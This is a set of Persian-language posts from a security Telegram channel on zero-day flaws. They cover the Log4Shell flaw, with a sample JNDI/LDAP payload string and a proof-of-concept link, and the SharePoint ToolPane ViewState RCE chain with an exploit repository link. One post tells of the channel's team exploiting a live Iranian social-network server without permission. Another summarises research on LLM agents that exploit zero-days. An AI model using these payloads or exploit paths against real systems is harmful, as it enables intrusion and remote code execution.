#Zero_Day Exploit #Publishing
یکی از عجایبی که امشب از برخی عزیزان مسئول که در محیط ClubHouse بودن شنیدیم این بود که هیچ یک از آسیب پذیری های روز صفر در دنیا عمومی نمیشود و از اونجا که صحبت های خودمون رو همواره مستند میکنیم یکسری از آسیب پذیری های روز صفری که تیم تحقیقاتی projectzero شرکت گوگل برای همین سالها منتشر کرده رو اینجا رفرنس میکنیم.


https://googleprojectzero.github.io/0days-in-the-wild/rca.html


@Unk9vvN
#Log4Shell #Zero_Day Exploit #Log4j Java Library
به تازگی آسیب پذیری کشف شده از نوع روز صفر که میتونه به مهاجم قدرت اجرای کد از راه دور رو بده، این آسیب پذیری با شناسه CVE-2021-44228 برای کتابخانه Apache log4j هستش که بسیاری از سرویس های ابری مانند Apple iCloud و Steam پیدا شده و میتوانسته مورد بهره برداری قرار بگیره، از نسخه 2.0 تا 2.14.1 این آسیب پذیری وجود داره و در نسخه 2.15.0 رفع شده.

https://t.me/Unk9vvN/1309

اما این آسیب پذیری مبتنی بر پروتکل HTTP و TCP میتونه به endpoint آسیب پذیر ارسال بشه و بهره برداری صورت بگیره، این آسیب پذیری در کتابخانه ای رخ داده که مامور Log مقادیر User Agent است و مهاجم میتونه پیلود خودش رو مبتنی بر پارامتر User Agent ارسال کرده و با wrapper پروتکل jndi دسترسی به ldap گرفته و ارتباطی رو مبتنی بر درگاهی ایجاد کنه.

Payload Example:

${jndi:ldap://127.0.0.1:1389/a}



https://github.com/tangxiaofeng7/apache-log4j-poc
https://issues.apache.org/jira/browse/LOG4J2-2109
@Unk9vvN
#Unk9vvN #Bug #Hunting #Zero-Day
یک سال پیش به‌طور اتفاقی و در جریان بررسی یک آسیب پذیری مورد کشف تیم آنون، متوجه شدیم چند مورد از سرور های آسیب پذیر در زیرساخت های ایران، مربوط به یک شبکه اجتماعی ایرانی هستند.

کنجکاو شدیم ببینیم آیا آسیب پذیری واقعا بر روی سرویس مد نظر وجود دارد یا خیر؟ بعد از اجرای اکسپلویت مشخص شد بله آسیب پذیر است، اما چیزی که برای ما جالب بود وجود یک Shell که یک نشست TCP به یک CDN چینی برقرار کرده است.

یعنی از قبل چینی ها بر روی این سرور سوار بوده اند حالا چطور مشخص نبود، اما چیزی که موضوعیت داشت این بود که از سرور شبکه اجتماعی ایرانی به‌طور واضح جاسوسی انجام میشد.

ما دسترسی آنها را قطع کردیم و با بررسی های بیشتر متوجه شدیم که بر روی همان سرور Agent Forwarder مربوط به Splunk که برای SIEM است، نصب بود و پنل Splunk نیز کشف شد که البته کاری با آن نداشتیم اما جالب بود که همه میروند و می آیند و این عزیزان نظاره گر هستند.

این پست رو عمدا زدم تا بگم خیلی اتفاقات می افته که ما نمیگیم، فکر نکنید خاموشیم!

@Unk9vvN
#Sharepoint #ToolPane #Zero-Day
دو آسیب پذیری روز صفر با شناسه CVE-2025-53770 و CVE-2025-53771 مطرح شده در یک حمله APT که محققین روی منطقه رخداد آسیب پذیری بررسی هایی انجام داده و موفق به کشف این آسیب پذیری ها شده اند.

فایل ToolPaneWrapper.aspx بصورت پیشفرض در Sharepoint وجود دارد و یکی از قابلیت های آن دریافت پارامتر ViewState از سمت کاربر، که در حالت عادی دارای امضای دیجیتال بوده و محافظت میشود.

اما صفحه مذکور بدون نیاز به احراز هویت در دسترس است و قابلیت ViewState MAC در این Endpoint غیر فعال است، بنابراین اگر مهاجم MachineKey مناسب سرور را داشته باشد، یا از MachineKey پیشفرض استفاده کرده باشد، میتواند با ارسال ViewState مخرب اقدام به RCE کند.

فرمت ViewState از نوع LosFormatter است که بواسطه ساخت یک Gadget Chain با شیء مثل TypeConfuseDelegate میتوان یک کد مخرب تعریف کرده که سمت سرور پارس و اجرا میشود.

دور زدن احراز هویت در PostAuthenticateRequestHandler بواسطه تعریف یک Referrer که اشاره به مسیر /_layouts/15/SignOut.aspx دارد عامل اصلی بوده است.

https://github.com/unk9vvn/sharepoint-toolpane

@Unk9vvN
#LLM #Agents #Exploit #Zero-Day #Vulnerabilities
اخیرا تحقیقاتی در دانشگاه ایلینویز انجام شد در خصوص نحوه کشف آسیب پذیری های روز صفر بواسطه Agent های مدل های زبانی بزرگ، که در فاز های اولیه توانسته است در محیط هایی مانند CTF و یا پلتفرم های Bug Bounty عمل کرد مناسبی را از خود نشان دهد.

در این مقاله مشخصا به نحوه پیاده سازی Hierarchical Planning and Task-Specific Agents پرداخته میشود به معنی آنکه، تاریخچه عملیات های قبلی همواره مبنای تعریف Task های پیش رو خواهد بود و نسبت به اتفاقاتی که در پایش های گذشته اتفاق افتاده است، رفتار LLM بهینه تر خواهد شد.

در این مقاله به مباحثی از جمله تشکیل Dataset های مورد نیاز در خصوص کشف آسیب پذیری های روز صفر که منظور، Payload های موفق است، پرداخته شده و عمل کرد HPTSA را در این خصوص بسیار موفق دانسته است.

رویکرد مورد تست هم جعبه سیاه بوده است هم جعبه سفید، که در کنار هم بواسطه کشف اولیه پترن آسیب پذیر در حالت جعبه سفید، تست های جعبه سیاه نیز آغاز میشود تا از وجود آسیب پذیری اطمینان حاصل شود.

https://arxiv.org/pdf/2406.01637
@Unk9vvN